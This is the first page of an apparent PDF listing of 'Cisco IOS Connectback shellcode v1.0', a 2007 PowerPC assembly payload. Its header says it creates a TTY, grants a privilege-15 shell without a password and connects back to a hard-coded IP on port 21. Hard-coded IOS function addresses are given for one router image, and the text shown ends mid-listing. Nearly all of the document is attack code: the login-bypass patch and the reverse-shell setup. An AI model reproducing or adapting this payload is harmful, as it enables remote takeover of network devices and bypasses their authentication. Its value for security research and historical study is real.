1 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 #
3 # Cisco IOS Connectback shellcode v1.0
4 # (c) 2007 IRM Plc
5 # By Gyan Chawdhary
6 #
7 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
8 #
9 # The code creates a new TTY, allocates a shell with privilege level 15 and connects back
10 # on port 21
11 #
12 # This shellcode can be used as the payload for any IOS exploit on a PowerPC−based device.
13 #
14 #
15 # The following five hard−coded addresses must be located for the target IOS version.
16 #
17 # The hard−coded addresses used here are for:
18 #
19 # IOS (tm) C2600 Software (C2600−IK9S−M), Version 12.3(22), RELEASE SOFTWARE (fc2)
20 #
21 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
22 .equ malloc, 0x804785CC
23 .equ allocate_tty, 0x803d155c
24 .equ ret, 0x804a42e8
25 .equ addr, 0x803c4ad8
26 .equ str, 0x81e270b4
27 .equ tcp_connect, 0x80567568
28 .equ tcp_execute_command, 0x8056c354
29 .equ login, 0x8359b1f4
30 .equ god, 0xff100000
31 .equ priv, 0x8359be64
32 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33
34 main:
35
stwu 1,−48(1)
36
mflr 0
37
stw 31,44(1)
38
stw 0,52(1)
39
mr 31,1
40
li 3,512
41
lis 9,malloc@ha #malloc() memory for tcp structure
42
la 9,malloc@l(9)
43
mtctr 9
44
bctrl
45
mr 0,3
46
stw 0,20(31)
47
lwz 9,12(31)
48
li 0,1
49
stb 0,0(9)
50
lwz 9,12(31)
51
lis 0,0xac1e # connect back ip address
52
ori 0,0,1018 #
Page 1/3
Cisco IOS Connectback shellcode v1.0
Gyan Chawdhary
08/13/2008
53
stw 0,4(9)
54
li 3,66
55
li 4,0
56
lis 9,allocate_tty@ha # allocate new TTY
57
la 9,allocate_tty@l(9)
58
mtctr 9
59
bctrl
60
addi 0,31,24
61
62
# Fix TTY structure to enable level 15 shell without password
63
#
64
#
65
##########################################################
66
67
# login patch begin
68
lis 9, login@ha
69
la 9, login@l(9)
70
li 8,0
71
stw 8, 0(9)
72
# login patch end
73
74
#IDA placeholder for con0
75
#
76